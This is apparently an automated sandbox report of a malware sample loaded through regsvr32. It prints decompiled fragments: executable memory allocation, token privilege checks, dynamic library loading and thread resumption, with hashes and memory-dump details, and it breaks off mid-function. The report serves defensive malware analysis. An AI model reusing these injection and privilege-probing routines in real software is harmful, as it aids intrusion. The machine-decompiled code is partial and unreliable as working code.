                                                                                                                                                                                              • Opcode Fuzzy Hash: c379da720500c8dd43712a74abd95a4797497ac692762218d68d67c3fd5b57e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2135B1614204EBEB14BFF4DD05AAD37E8EB14315F10852AB719DB1D0EB78F9818B61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 420 4abf9d0-4abfa1b call 4abfdc0 423 4abfa2a-4abfa5a call 4abf7a0 VirtualAlloc 420->423 424 4abfa1d-4abfa27 call 4abfdc0 420->424 424->423
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04ABFA54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID: VirtualAlloc
                                                                                                                                                                                              • API String ID: 4275171209-164498762
                                                                                                                                                                                              • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction ID: 8d6c86e0760da0c911086535f44f3092d1055fcf1c6a0362d35cc4034abdb904
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E111260D082C9DEFF01DBE898097EFBFB55F11708F084098E5846B282D6BA575887F6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04AFF05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                              				struct HINSTANCE__* _t7;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                              				_t22 = __edx;
                                                                                                                                                                                              				_t5 = E04AF9DD8(_a4);
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v8 = _t5;
                                                                                                                                                                                              				_push(_t5);
                                                                                                                                                                                              				if(_a4 != 0xf43) {
                                                                                                                                                                                              					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t7 = GetModuleHandleA();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                              					_t10 = E04AFF011(_t12, _t22, _t7); // executed
                                                                                                                                                                                              					_t25 = _t10;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04AF8B9C( &_v8);
                                                                                                                                                                                              				return _t25;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: d4e02b229f27662d95ddf75e46a74f08c55859b31f4cd5f24584bcd76b80d76b
                                                                                                                                                                                              • Instruction ID: e0c8b0ee8d1daca40b5b869a4b8cdd26a7de2a3457d083294f38abbdda6a26fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4e02b229f27662d95ddf75e46a74f08c55859b31f4cd5f24584bcd76b80d76b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DF0A771300214AFE714ABE9ED848AAB3ECDF58255720403BFB06D3250FAB0EE40C6A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04AFC8C9(void* __ecx, void* __esi) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				short _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                              				char _t45;
                                                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t37 = 0;
                                                                                                                                                                                              				_v28 = 0x500;
                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_t20 = E04AFC79E(__ecx);
                                                                                                                                                                                              				_v16 = _t20;
                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                              					_push( &_v24);
                                                                                                                                                                                              					_t44 = 2;
                                                                                                                                                                                              					_t21 = E04AFC7F5(_t44); // executed
                                                                                                                                                                                              					_t48 = _t21;
                                                                                                                                                                                              					_v20 = _t48;
                                                                                                                                                                                              					if(_t48 == 0) {
                                                                                                                                                                                              						L10:
                                                                                                                                                                                              						FindCloseChangeNotification(_v16);
                                                                                                                                                                                              						if(_t48 != 0) {
                                                                                                                                                                                              							E04AF8BF4( &_v20, _t37);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return _t45;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push( &_v12);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0x220);
                                                                                                                                                                                              					_push(0x20);
                                                                                                                                                                                              					_push(2);
                                                                                                                                                                                              					_push( &_v32);
                                                                                                                                                                                              					_t29 =  *0x4b0f820; // 0x4c2faa0
                                                                                                                                                                                              					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *_t48 <= 0) {
                                                                                                                                                                                              						L9:
                                                                                                                                                                                              						_t31 =  *0x4b0f820; // 0x4c2faa0
                                                                                                                                                                                              						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                              					_t33 = _t9;
                                                                                                                                                                                              					_v8 = _t33;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push( *_t33);
                                                                                                                                                                                              						_t34 =  *0x4b0f820; // 0x4c2faa0
                                                                                                                                                                                              						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t37 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _v8 + 8;
                                                                                                                                                                                              						_v8 = _t33;
                                                                                                                                                                                              						if(_t37 <  *_t48) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t45 = 1;
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t20;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFC79E: GetCurrentThread.KERNEL32 ref: 04AFC7B1
                                                                                                                                                                                                • Part of subcall function 04AFC79E: OpenThreadToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7B8
                                                                                                                                                                                                • Part of subcall function 04AFC79E: GetLastError.KERNEL32(?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7BF
                                                                                                                                                                                                • Part of subcall function 04AFC79E: OpenProcessToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7E4
                                                                                                                                                                                                • Part of subcall function 04AFC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04AF0000,00000000,00000000,?,04AFC876,00000000,00000000,?,04AFC89F), ref: 04AFC810
                                                                                                                                                                                                • Part of subcall function 04AFC7F5: GetLastError.KERNEL32(?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04AF0000), ref: 04AFC96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: a47b00787e9ebbb97c439ee13f6082fd1155598cb50d613f555f6cbba93cad71
                                                                                                                                                                                              • Instruction ID: 1e92bab3aa9cdc61c73e0d8c5e84f1f862fef3ca5558ea2ae1da40310ee3d0c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a47b00787e9ebbb97c439ee13f6082fd1155598cb50d613f555f6cbba93cad71
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC214F72A00209AFDB20DFEADCC5AAEB7F8FF48720B504469F611E7151D774AA419B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF6298(void* __fp0) {
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				intOrPtr _t17;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t32 = __fp0;
                                                                                                                                                                                              				E04AF6412();
                                                                                                                                                                                              				GetOEMCP();
                                                                                                                                                                                              				_t13 = E04AFDF3D(__fp0); // executed
                                                                                                                                                                                              				 *0x4b0f81c = _t13;
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                                              					_t14 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t2 = _t14 + 0x224; // 0x4af0000
                                                                                                                                                                                              					E04B03BD5( *_t2);
                                                                                                                                                                                              					_t26 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t25 = _t27;
                                                                                                                                                                                              					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                                              					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                                              						_t7 = _t26 + 0x224; // 0x4af0000, executed
                                                                                                                                                                                              						_t26 =  *_t7;
                                                                                                                                                                                              						_t16 = E04AFD804( *_t7); // executed
                                                                                                                                                                                              						__eflags = _t16;
                                                                                                                                                                                              						_t17 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                                              							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                                              								L10:
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								return 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							E04AF35A1();
                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t20 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E04AF611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t13 + 1;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 04AF629D
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetCurrentProcessId.KERNEL32 ref: 04AFDF64
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetLastError.KERNEL32 ref: 04AFE05E
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetSystemMetrics.USER32(00001000), ref: 04AFE06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1196160345-0
                                                                                                                                                                                              • Opcode ID: e4419585e7b7c0a013619d50bd8989b499db8488775a66b1178bc56466fba05b
                                                                                                                                                                                              • Instruction ID: af6313178b689de61efe919c3694fa2df16f4cb308132502ceb0fc41556ba6c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4419585e7b7c0a013619d50bd8989b499db8488775a66b1178bc56466fba05b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18011A31744202CED725EFE8AE08AE677E8FB56315F0582B6F6058B121D77468839BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFC879(void* __ecx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t12 =  *0x4b0f820; // 0x4c2faa0
                                                                                                                                                                                              				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					_t14 = E04AFC862(); // executed
                                                                                                                                                                                              					_t23 = _t14;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						FindCloseChangeNotification(_v8);
                                                                                                                                                                                              						_t17 = _t23;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_v8 != _t14) {
                                                                                                                                                                                              							_t18 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t17 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ed36a67daa86271e47bd40c67462fdb8957476b030251bc4af01dbae05a0ab59
                                                                                                                                                                                              • Instruction ID: 920d08a1ccd3dc3c0363ae3d28bacc82cd7b20caffbd956dee0e529bc2ed42da
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed36a67daa86271e47bd40c67462fdb8957476b030251bc4af01dbae05a0ab59
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF01732B10208EBEB21DBA6DD05A9D73F8FB08656F4141A5F601E7161DB75EE00ABA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF632E() {
                                                                                                                                                                                              				intOrPtr _t3;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t3 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t3 + 0x2c))( *0x4b0f83c, 0xffffffff);
                                                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x04af632e
                                                                                                                                                                                              0x04af633b
                                                                                                                                                                                              0x04af6345

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 04AF6345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              • Opcode ID: 9ac74b8c180d77bc2be044317cdba5a7316c96b4834544949bc1e764a7553b1e
                                                                                                                                                                                              • Instruction ID: d3abb38864314357ef166303e48fb24b1b5238f9bbcd8db709fd9f8bb03799fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac74b8c180d77bc2be044317cdba5a7316c96b4834544949bc1e764a7553b1e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC00271314210DFC7609B64E849FA437E4FB19323F1187A2F529DB1F5CBA498819B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF8BDE(long _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = RtlAllocateHeap( *0x4b0f900, 8, _a4); // executed
                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x04af8bec
                                                                                                                                                                                              0x04af8bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: a7a751b9311a54c2abafade80c8c4ab2aecf1d8ce514020a8b9e46444cd50372
                                                                                                                                                                                              • Instruction ID: 78ea743546f76f8188e68738e8e0b59cf08c99512defeea56f9bd11aa36eb6d4
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7a751b9311a54c2abafade80c8c4ab2aecf1d8ce514020a8b9e46444cd50372
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AB0923118020CBBCB111AA1EC05B943F29F724656F004012F60C06061DBA6A8A09BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E04AFDA57(void* __ecx) {
                                                                                                                                                                                              				signed int _t4;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~_t4 & 0x00000001;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x04afda5f
                                                                                                                                                                                              0x04afda67
                                                                                                                                                                                              0x04afda6c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,04AFD8C2,?,?,00000001), ref: 04AFDA5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 3cdcf155b5d803fa55687658410d86d727dfe7aded731c3f138b5941f13db6ff
                                                                                                                                                                                              • Instruction ID: 442742d73c2ca176a02c37712f3fd9339a8cd7604f24117926b68b5d0da47866
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdcf155b5d803fa55687658410d86d727dfe7aded731c3f138b5941f13db6ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56B092323A00019BCB104B74E80B9E03BE0FB66606798C2F0A005C6061C36EC8868A80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF8BC9() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                              				 *0x4b0f900 = _t1;
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x04af8bd2
                                                                                                                                                                                              0x04af8bd8
                                                                                                                                                                                              0x04af8bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,04AF6502), ref: 04AF8BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: 9a1f3ca122a63c49790a352ff3b43a351f2dea059dbb5fb4ad3a403213d6401e
                                                                                                                                                                                              • Instruction ID: db83f74515beaaeb26711903e116fbed0b1f438ce6fff11c55a54d286ae3755a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a1f3ca122a63c49790a352ff3b43a351f2dea059dbb5fb4ad3a403213d6401e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB012B03813006AD6200B205C06B013510E3A0B03F104002B6059A1C0E7E464809524
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E04AFDA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int* _t36;
                                                                                                                                                                                              				signed int* _t39;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                                                              				_t28 = _t36[1];
                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                              					_t39 = _t36[2];
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                              						if(_t39[2] > 0) {
                                                                                                                                                                                              							_t31 = _t39[3];
                                                                                                                                                                                              							_t22 = _a4 + 0x24;
                                                                                                                                                                                              							_v12 = _a4 + 0x24;
                                                                                                                                                                                              							_v8 = _t39[3];
                                                                                                                                                                                              							while(E04AFA0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                                              								_t26 = _a8 + 1;
                                                                                                                                                                                              								_t31 = _v8 + 4;
                                                                                                                                                                                              								_a8 = _t26;
                                                                                                                                                                                              								_t22 = _v12;
                                                                                                                                                                                              								_v8 = _v8 + 4;
                                                                                                                                                                                              								if(_t26 < _t39[2]) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_t39 =  &(_t39[4]);
                                                                                                                                                                                              						_t28 = _t28 - 1;
                                                                                                                                                                                              					} while (_t28 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				Sleep(0xa);
                                                                                                                                                                                              				return 1;
                                                                                                                                                                                              			}










                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 04AFDAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: c0adda7d6bedeaff4cad0b505c85fde190304832d09147f2a1a1ea4e9e390683
                                                                                                                                                                                              • Instruction ID: 0bbfcef140870e41af3b159124bb20acb713da4893664777a9c97adac597bd79
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0adda7d6bedeaff4cad0b505c85fde190304832d09147f2a1a1ea4e9e390683
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42115B31A04305EFEB11DFA9C984AA9B7E8FB88324F148469E99A9B300D370F940CB44
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E04AFEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
